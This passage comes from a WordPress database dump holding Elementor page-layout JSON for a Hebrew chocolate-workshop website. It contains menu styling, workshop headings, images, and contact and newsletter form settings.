"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(301,77,'_elementor_version','0.4'),(302,78,'_wp_page_template','elementor_canvas'),(303,78,'_elementor_edit_mode','builder'),(304,78,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from 